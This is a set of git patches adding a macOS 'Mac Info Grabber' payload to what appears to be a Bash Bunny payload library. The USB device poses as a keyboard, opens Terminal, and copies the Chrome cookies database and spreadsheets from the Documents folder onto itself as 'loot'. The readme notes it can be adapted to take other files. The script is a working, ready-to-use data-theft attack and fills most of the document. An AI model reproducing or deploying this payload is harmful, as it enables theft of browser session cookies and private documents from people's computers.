From adb87d9919daad551ebaac5ca90389708e238f9d Mon Sep 17 00:00:00 2001
From: bobmcdouble3 <bobmcdouble3@gmail.com>
Date: Wed, 8 Mar 2017 18:27:47 -0500
Subject: [PATCH 1/5] Add files via upload

---
 payloads/library/macinfograbber/payload.txt | 33 +++++++++++++++++++++
 payloads/library/macinfograbber/readme.md   | 20 +++++++++++++
 2 files changed, 53 insertions(+)
 create mode 100644 payloads/library/macinfograbber/payload.txt
 create mode 100644 payloads/library/macinfograbber/readme.md

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
new file mode 100644
index 00000000..e63b44fa
--- /dev/null
+++ b/payloads/library/macinfograbber/payload.txt
@@ -0,0 +1,33 @@
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 8000
+QUACK STRING mkdir -p /Volumes/BashBunny/MacLoot/xlsx
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/MacLoot/chromecookies.db
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/MacLoot/xlsx/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK GUI q
+QUACK DELAY 500
+QUACK ENTER
+
+# Green LED for finished
+LED G
+
+files=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+if [ "$files" != "0" -o "$files2" != "0"]
+then
+# Got spreadsheet files
+LED R B
+else
+LED R
+# No spread sheets
+fi
diff --git a/payloads/library/macinfograbber/readme.md b/payloads/library/macinfograbber/readme.md
new file mode 100644
index 00000000..2222832c
--- /dev/null
+++ b/payloads/library/macinfograbber/readme.md
@@ -0,0 +1,20 @@
+# Mac Info Grabber for the BashBunny
+
+* Author: kmakblob
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
+the Documents folder and places them inside a folder on the BashBunny called MacLoot.
+
+This payload can be easily modified to grab other files like word docs or csv files.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Green              | Attack Finished                              |
+| Purple             | Successfully grabbed xls or xlsx files       |
+| RED                | Did not get any xls or xlsx files            |

From 4af04427aa0bce6b62d44e4f1b423dc827e5210f Mon Sep 17 00:00:00 2001
From: bobmcdouble3 <bobmcdouble3@gmail.com>
Date: Wed, 8 Mar 2017 19:33:30 -0500
Subject: [PATCH 2/5] Add files via upload

MacInfoGrabber 1.1: Updates: Made the loot folder more detailed and changed it to payloads/SWITCH_POSITION/MacLoot
---
 macinfograbber/payload.txt | 33 +++++++++++++++++++++++++++++++++
 macinfograbber/readme.md   | 20 ++++++++++++++++++++
 2 files changed, 53 insertions(+)
 create mode 100644 macinfograbber/payload.txt
 create mode 100644 macinfograbber/readme.md

diff --git a/macinfograbber/payload.txt b/macinfograbber/payload.txt
new file mode 100644
index 00000000..a34ed342
--- /dev/null
+++ b/macinfograbber/payload.txt
@@ -0,0 +1,33 @@
+LED R
+ATTACKMODE HID STORAGE
+QUACK GUI SPACE
+QUACK DELAY 1000
+QUACK STRING terminal
+QUACK ENTER
+QUACK DELAY 8000
+QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
+QUACK ENTER
+QUACK DELAY 1000
+QUACK GUI q
+QUACK DELAY 500
+QUACK ENTER
+
+# Green LED for finished
+LED G
+
+files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+if [ "$files" != "0" -o "$files2" != "0"]
+then
+# Got spreadsheet files
+LED R B
+else
+LED R
+# No spread sheets
+fi
diff --git a/macinfograbber/readme.md b/macinfograbber/readme.md
new file mode 100644
index 00000000..2222832c
--- /dev/null
+++ b/macinfograbber/readme.md
@@ -0,0 +1,20 @@
+# Mac Info Grabber for the BashBunny
+
+* Author: kmakblob
+* Version: Version 1.0
+* Target: OSX
+
+## Description
+
+A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
+the Documents folder and places them inside a folder on the BashBunny called MacLoot.
+
+This payload can be easily modified to grab other files like word docs or csv files.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Green              | Attack Finished                              |
+| Purple             | Successfully grabbed xls or xlsx files       |
+| RED                | Did not get any xls or xlsx files            |

From 0f2a390fb1c6cee63544e749413c958603159969 Mon Sep 17 00:00:00 2001
From: kmakblob <kmakblob@gmail.com>
Date: Wed, 8 Mar 2017 19:38:52 -0500
Subject: [PATCH 3/5] d

---
 macinfograbber/payload.txt | 33 ---------------------------------
 macinfograbber/readme.md   | 20 --------------------
 2 files changed, 53 deletions(-)
 delete mode 100644 macinfograbber/payload.txt
 delete mode 100644 macinfograbber/readme.md

diff --git a/macinfograbber/payload.txt b/macinfograbber/payload.txt
deleted file mode 100644
index a34ed342..00000000
--- a/macinfograbber/payload.txt
+++ /dev/null
@@ -1,33 +0,0 @@
-LED R
-ATTACKMODE HID STORAGE
-QUACK GUI SPACE
-QUACK DELAY 1000
-QUACK STRING terminal
-QUACK ENTER
-QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
-QUACK ENTER
-QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
-QUACK ENTER
-QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
-QUACK ENTER
-QUACK DELAY 1000
-QUACK GUI q
-QUACK DELAY 500
-QUACK ENTER
-
-# Green LED for finished
-LED G
-
-files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
-if [ "$files" != "0" -o "$files2" != "0"]
-then
-# Got spreadsheet files
-LED R B
-else
-LED R
-# No spread sheets
-fi
diff --git a/macinfograbber/readme.md b/macinfograbber/readme.md
deleted file mode 100644
index 2222832c..00000000
--- a/macinfograbber/readme.md
+++ /dev/null
@@ -1,20 +0,0 @@
-# Mac Info Grabber for the BashBunny
-
-* Author: kmakblob
-* Version: Version 1.0
-* Target: OSX
-
-## Description
-
-A payload that grabs the chrome cookies sqlite3 file and also any spreadsheets in
-the Documents folder and places them inside a folder on the BashBunny called MacLoot.
-
-This payload can be easily modified to grab other files like word docs or csv files.
-
-## STATUS
-
-| LED                | Status                                       |
-| ------------------ | -------------------------------------------- |
-| Green              | Attack Finished                              |
-| Purple             | Successfully grabbed xls or xlsx files       |
-| RED                | Did not get any xls or xlsx files            |

From dfeb22540990ff8f04ac4b526d8b3a64e2bb3c2e Mon Sep 17 00:00:00 2001
From: bobmcdouble3 <bobmcdouble3@gmail.com>
Date: Wed, 8 Mar 2017 19:40:47 -0500
Subject: [PATCH 4/5] Add files via upload

---
 payloads/library/macinfograbber/payload.txt | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index e63b44fa..a34ed342 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -5,13 +5,13 @@ QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
 QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/MacLoot/xlsx
+QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/MacLoot/chromecookies.db
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
 QUACK ENTER
 QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/MacLoot/xlsx/
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
 QUACK ENTER
 QUACK DELAY 1000
 QUACK GUI q
@@ -21,8 +21,8 @@ QUACK ENTER
 # Green LED for finished
 LED G
 
-files=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
 if [ "$files" != "0" -o "$files2" != "0"]
 then
 # Got spreadsheet files

From f0fff03845dbff440a1b086be57b945606219205 Mon Sep 17 00:00:00 2001
From: bobmcdouble3 <bobmcdouble3@gmail.com>
Date: Thu, 9 Mar 2017 07:01:33 -0500
Subject: [PATCH 5/5] Add files via upload

---
 payloads/library/macinfograbber/payload.txt | 26 +++++++++++++++++----
 1 file changed, 21 insertions(+), 5 deletions(-)

diff --git a/payloads/library/macinfograbber/payload.txt b/payloads/library/macinfograbber/payload.txt
index a34ed342..cf4461b0 100644
--- a/payloads/library/macinfograbber/payload.txt
+++ b/payloads/library/macinfograbber/payload.txt
@@ -1,17 +1,33 @@
+#!/bin/bash
+#
+# Title:         Mac Info Grabber
+# Author:        kmakblob
+# Version:       1.1
+#
+# Steaks cookies from chrome and documents from the documents folder (spreadsheets)
+# then stashes them in /root/udisk/loot/MacLoot
+#
+# Red................Failed to get spreadsheets
+# Purple.............Got some spreadsheets
+# Green..............Finished
+#
+
 LED R
 ATTACKMODE HID STORAGE
+LOOTDIR=/root/udisk/loot/MacLoot
+mkdir -p $LOOTDIR
 QUACK GUI SPACE
 QUACK DELAY 1000
 QUACK STRING terminal
 QUACK ENTER
 QUACK DELAY 8000
-QUACK STRING mkdir -p /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx
+QUACK STRING mkdir -p /Volumes/BashBunny/$LOOTDIR/xlsx
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/chromecookies.db
+QUACK STRING cat ~/Library/Application Support/Google/Chrome/Default/Cookies > /Volumes/BashBunny/$LOOTDIR/chromecookies.db
 QUACK ENTER
 QUACK DELAY 1000
-QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/
+QUACK STRING cd ~/Documents && cp *.xlsx *.xls /Volumes/BashBunny/$LOOTDIR/xlsx/
 QUACK ENTER
 QUACK DELAY 1000
 QUACK GUI q
@@ -21,8 +37,8 @@ QUACK ENTER
 # Green LED for finished
 LED G
 
-files=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xls 2> /dev/null | wc -l)
-files2=$(ls /Volumes/BashBunny/payloads/$SWITCH_POSITION/MacLoot/xlsx/*.xlsx 2> /dev/null | wc -l)
+files=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xls 2> /dev/null | wc -l)
+files2=$(ls /Volumes/BashBunny/$LOOTDIR/xlsx/*.xlsx 2> /dev/null | wc -l)
 if [ "$files" != "0" -o "$files2" != "0"]
 then
 # Got spreadsheet files